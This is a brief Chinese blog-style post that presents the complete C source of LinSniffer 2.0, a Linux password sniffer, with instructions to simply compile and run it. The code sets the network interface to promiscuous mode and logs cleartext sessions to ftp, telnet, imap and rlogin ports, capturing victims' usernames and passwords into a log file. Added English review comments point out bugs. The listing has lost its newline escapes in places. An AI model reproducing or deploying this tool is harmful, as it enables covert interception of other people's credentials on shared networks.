不多说,linux下的经典嗅探利器——linsniffer,短小精悍。主要用于pop3/telnet/rlogin 密码嗅探。 源代码如下,gcc编译以后即可运行。

  1/*
  2LinSniffer 2.0
  3Lord Somer
  4 - now creates a pidfile when run(deletes it upon exiting)
  5 - no longer logs pop2/pop3, just uncomment the lines for em below if u wanna log them
  6 - thanks to neek for help with some of the coding
  7--- old ver info ---
  8LinSniffer 0.03 [BETA]
  9Mike Edulla
 10medulla@infosoc.com
 11*/
/* On-disk artifacts this program leaves; both paths are relative to the working directory. */
#define TCPLOG "tcp.log"      /* capture log, opened for append unless stdout is selected in main() */
#define PIDFILE "sniff.pid"   /* written at startup; nothing in this listing actually removes it again */
 14#include <sys/types.h>
 15#include <sys/socket.h>
 16#include <sys/time.h>
 17#include <netinet/in.h>
 18#include <netdb.h>
 19#include <string.h>
 20#include <linux/if.h>
 21#include <signal.h>
 22#include <stdio.h>
 23#include <arpa/inet.h>
 24#include <linux/socket.h>
 25#include <linux/ip.h>
 26#include <linux/tcp.h>
 27#include <linux/if_ether.h>
 28#include <sys/ioctl.h>
/* Forward declarations for the functions defined below. */
int openintf(char *);
int read_tcp(int);
int filter(void);
int print_header(void);
int print_data(int, char *);
char *hostlookup(unsigned long int);
/* Scratch buffer for the shell command built at the end of main() ("rm " + PIDFILE). */
char fuckfuck[40];
void clear_victim(void);
void cleanup(int);
/*
 * One captured frame, read() straight from the SOCK_PACKET socket in read_tcp():
 * Ethernet header, IP header, TCP header, then payload.
 * NOTE(review): main() does not read ip/tcp through these members but through
 * the global `ip`/`tcp` pointers, which it sets 2 bytes *before* ep.ip and
 * ep.tcp — presumably to undo alignment padding the compiler inserts after the
 * Ethernet header. Confirm the actual offsets for the target ABI before
 * touching this layout.
 */
struct etherpacket
{
   struct ethhdr eth;
   struct iphdr  ip;
   struct tcphdr tcp;
   char buff[8192];   /* payload area; main() never checks its size against the length it passes on */
}ep;
/*
 * State of the single TCP session currently being logged (filter() tracks at
 * most one at a time). All fields are zero while idle; see clear_victim().
 */
struct
{
   unsigned long      saddr;        /* client/server IPv4 addresses, kept in network byte order */
   unsigned long      daddr;
   unsigned short     sport;        /* client/server ports, also raw network byte order */
   unsigned short     dport;
   int                bytes_read;   /* payload bytes logged so far; compared with CAPTLEN in filter() */
   char               active;       /* non-zero while a session is being followed */
   time_t             start_time;   /* time(NULL) at the SYN; TIMEOUT is measured from here, not from last activity */
} victim;
/* Header views into `ep`, set once in main() (with a -2 byte adjustment). */
struct iphdr  *ip;
struct tcphdr *tcp;
int s;      /* capture socket returned by openintf() */
FILE *fp;   /* log destination: stdout or TCPLOG */
#define CAPTLEN 512   /* max payload bytes logged per session before "[CAPLEN Exceeded]" */
#define TIMEOUT 30    /* seconds after the SYN at which a session is dropped as "[Timed Out]" */
/*
 * Open a raw SOCK_PACKET socket for IP frames (ethertype 0x800, i.e. ETH_P_IP)
 * and set IFF_PROMISC on interface `d`.
 * Returns the socket descriptor. If the socket cannot be created or the
 * current flags cannot be read it prints a message and terminates — with
 * exit(0), so the error is not visible in the exit status. A failure to set
 * promiscuous mode is only reported; the socket is still returned.
 * NOTE(review): `d` is copied into ifr.ifr_name with an unbounded strcpy, so
 * it must be shorter than that array; the only caller passes the literal
 * "eth0".
 * NOTE(review): the local `s` shadows the file-scope socket `s`.
 */
int openintf(char *d)
{
   int fd;
   struct ifreq ifr;
   int s;   /* ioctl status, not the global socket */
   fd=socket(AF_INET, SOCK_PACKET, htons(0x800));
   if(fd < 0)
   {
      perror("cant get SOCK_PACKET socket");
      exit(0);
   }
   strcpy(ifr.ifr_name, d);
   s=ioctl(fd, SIOCGIFFLAGS, &ifr);
   if(s < 0)
   {
      close(fd);
      perror("cant get flags");
      exit(0);
   }
   /* Read-modify-write of the flags so the other bits are preserved. */
   ifr.ifr_flags |= IFF_PROMISC;
   s=ioctl(fd, SIOCSIFFLAGS, &ifr);
   if(s < 0) perror("cant set promiscuous mode");
   return fd;
}
/*
 * Block until a frame that filter() accepts has been read into `ep`, then
 * return the number of payload bytes in it.
 * The 54 subtracted below is presumably 14 (Ethernet) + 20 (IP) + 20 (TCP)
 * bytes of fixed headers; IP/TCP options are not accounted for, so frames
 * carrying options would be mis-sliced.
 * A failed read() (negative return) is not reported; the loop just retries.
 * NOTE(review): main() discards this return value and sizes the payload from
 * ip->tot_len instead, so the bytes actually read never bound print_data().
 * The parameter `s` shadows the file-scope socket `s`.
 */
int read_tcp(int s)
{
   int x;
   while(1)
   {
      x=read(s, (struct etherpacket *)&ep, sizeof(ep));
      if(x > 1)
      {
         if(filter()==0) continue;   /* not (or no longer) the tracked session */
         x=x-54;                     /* strip the assumed fixed-size headers */
         if(x < 1) continue;         /* nothing left to log */
         return x;
      }
   }
}
/*
 * Decide whether the frame currently in `ep` belongs to the session being
 * logged. Returns 1 if so, 0 otherwise.
 * Side effects: may write a session-end marker and reset `victim`, or — when
 * idle and a SYN towards a watched port arrives — start following that
 * session and print its header via print_header().
 * Only one session is followed at a time; all other traffic is dropped until
 * it ends (RST/FIN from the client side), exceeds CAPTLEN logged bytes, or is
 * older than TIMEOUT seconds counted from its SYN.
 * NOTE(review): the bare "n" at both ends of the marker strings looks like a
 * "\n" whose backslash was lost when this listing was rendered.
 */
int filter(void)
{
   int p;   /* 1 when the destination port is one of the watched services */
   p=0;
   if(ip->protocol != 6) return 0;   /* 6 = TCP */
   /* Drop the session once enough payload has been logged ... */
   if(victim.active != 0)
      if(victim.bytes_read > CAPTLEN)
      {
         fprintf(fp, "n----- [CAPLEN Exceeded]n");
         clear_victim();
         return 0;
      }
   /* ... or once it has been open longer than TIMEOUT seconds. */
   if(victim.active != 0)
      if(time(NULL) > (victim.start_time + TIMEOUT))
      {
         fprintf(fp, "n----- [Timed Out]n");
         clear_victim();
         return 0;
      }
   /* Watched destination ports, compared in host byte order. */
   if(ntohs(tcp->dest)==21)  p=1; /* ftp */
   if(ntohs(tcp->dest)==23)  p=1; /* telnet */
/*   if(ntohs(tcp->dest)==110) p=1;  pop3 */
/*   if(ntohs(tcp->dest)==109) p=1;  pop2 */
   if(ntohs(tcp->dest)==143) p=1; /* imap2 */
   if(ntohs(tcp->dest)==513) p=1; /* rlogin */
/*   if(ntohs(tcp->dest)==106) p=1;  poppasswd */
   /* Idle: latch onto the first SYN towards a watched port. */
   if(victim.active == 0)
      if(p == 1)
         if(tcp->syn == 1)
         {
            victim.saddr=ip->saddr;   /* addresses and ports stored raw, network byte order */
            victim.daddr=ip->daddr;
            victim.active=1;
            victim.sport=tcp->source;
            victim.dport=tcp->dest;
            victim.bytes_read=0;
            victim.start_time=time(NULL);
            print_header();
         }
   /* Only the client->server direction of the tracked 4-tuple passes; while
    * idle these compare against zeros and so reject everything. */
   if(tcp->dest != victim.dport) return 0;
   if(tcp->source != victim.sport) return 0;
   if(ip->saddr != victim.saddr) return 0;
   if(ip->daddr != victim.daddr) return 0;
   /* Teardown from the client side ends the session. */
   if(tcp->rst == 1)
   {
      victim.active=0;
      alarm(0);   /* NOTE(review): nothing in this listing ever arms an alarm */
      fprintf(fp, "n----- [RST]n");
      clear_victim();
      return 0;
   }
   if(tcp->fin == 1)
   {
      victim.active=0;
      alarm(0);
      fprintf(fp, "n----- [FIN]n");
      clear_victim();
      return 0;
   }
   return 1;
}
/*
 * Write the "client => server [port]" line that opens each logged session.
 * Both names come from hostlookup(), i.e. a gethostbyaddr() reverse lookup
 * per address. Declared int but returns nothing; filter() ignores the result.
 */
int print_header(void)
{
   fprintf(fp, "n");
   fprintf(fp, "%s => ", hostlookup(ip->saddr));
   fprintf(fp, "%s [%d]n", hostlookup(ip->daddr), ntohs(tcp->dest));
}
/*
 * Append `datalen` bytes of captured payload to the log as printable text.
 * A CR (13) starts a new log line, non-printable bytes are dropped, and a
 * line is also broken after 75 printed characters. Advances
 * victim.bytes_read, which filter() compares with CAPTLEN.
 * NOTE(review): the loop runs while `i != datalen`, so a negative datalen
 * (main() derives it from the packet's own tot_len without checking it
 * against the bytes actually read) does not terminate and walks past the
 * buffer.
 * NOTE(review): isprint() receives a plain char; negative values are
 * undefined for <ctype.h>, and <ctype.h> is not included above.
 * Declared int but returns nothing; main() ignores the result.
 */
int print_data(int datalen, char *data)
{
   int i=0;
   int t=0;   /* characters printed on the current log line */
   victim.bytes_read=victim.bytes_read+datalen;
   for(i=0;i != datalen;i++)
   {
      if(data[i] == 13) { fprintf(fp, "n"); t=0; }
      if(isprint(data[i])) {fprintf(fp, "%c", data[i]);t++;}
      if(t > 75) {t=0;fprintf(fp, "n");}
   }
}
/*
 * Entry point: record the pid in PIDFILE, open eth0 in promiscuous mode,
 * install signal handlers, choose the log destination and capture forever.
 * Logs to stdout when exactly one command-line argument is given (its value
 * is not examined), otherwise appends to TCPLOG.
 * NOTE(review): implicit-int return type (pre-C99 style).
 * NOTE(review): the for(;;) below never exits, so the rm of PIDFILE after it
 * is unreachable, and cleanup() does not remove the file either — despite the
 * header comment, the pidfile is left behind.
 */
main(int argc, char **argv)
{
   FILE *fucker;
   fucker = fopen(PIDFILE, "w");   /* NOTE(review): unchecked; a NULL here is dereferenced by fprintf */
   fprintf(fucker, "%dn", getpid());
   fclose(fucker);
   s=openintf("eth0");             /* interface name is hard-coded */
   /* Header views start 2 bytes before the struct members: presumably this
    * undoes alignment padding inserted after the 14-byte Ethernet header so
    * the views line up with the bytes on the wire — confirm for the ABI. */
   ip=(struct iphdr *)(((unsigned long)&ep.ip)-2);
   tcp=(struct tcphdr *)(((unsigned long)&ep.tcp)-2);
   signal(SIGHUP, SIG_IGN);
   signal(SIGINT, cleanup);
   signal(SIGTERM, cleanup);
   signal(SIGKILL, cleanup);       /* SIGKILL cannot be caught; this call has no effect */
   signal(SIGQUIT, cleanup);
   if(argc == 2) fp=stdout;
   else fp=fopen(TCPLOG, "at");
   if(fp == NULL) { fprintf(stderr, "cant open logn");exit(0);}
   clear_victim();
   for(;;)
   {
      read_tcp(s);   /* its return value (payload bytes actually read) is discarded */
      /* Payload length comes from the packet's own tot_len (htons and ntohs
       * are the same byte swap on 16 bits) minus the header struct sizes,
       * i.e. options are assumed absent; it is bounded neither by the bytes
       * read nor by sizeof ep.buff. ep.buff-2 mirrors the -2 adjustment above. */
      if(victim.active != 0) print_data(htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-2);
      fflush(fp);
   }
   sprintf(fuckfuck,"rm %s", PIDFILE);   /* unreachable; fixed string, no external input */
   system(fuckfuck);
}
/*
 * Resolve an IPv4 address (network byte order) to a host name via
 * gethostbyaddr(), falling back to dotted-quad text when there is no PTR.
 * Returns a pointer to a static buffer that is overwritten on every call.
 * NOTE(review): h_name is copied without a bound; a resolver answer longer
 * than the buffer would overflow it.
 */
char *hostlookup(unsigned long int in)
{
   static char blah[1024];
   struct in_addr addr = { .s_addr = in };
   struct hostent *ent = gethostbyaddr((char *)&addr, sizeof addr, AF_INET);
   const char *name = (ent != NULL) ? ent->h_name : inet_ntoa(addr);
   strcpy(blah, name);
   return blah;
}
/* Reset the session tracker to its idle state: every field zero, active == 0. */
void clear_victim(void)
{
   memset(&victim, 0, sizeof victim);
}
/*
 * Signal handler for SIGINT/SIGTERM/SIGQUIT: note the exit in the log, close
 * the capture socket and the log, and terminate with status 0.
 * The signal number is not used; every signal takes the same path.
 * NOTE(review): fputs/fclose/exit are not async-signal-safe, so this handler
 * can corrupt stdio state if the signal lands mid-fprintf in the main loop.
 */
void cleanup(int sig)
{
   (void)sig;
   fputs("Exiting...n", fp);
   close(s);
   fclose(fp);
   exit(0);
}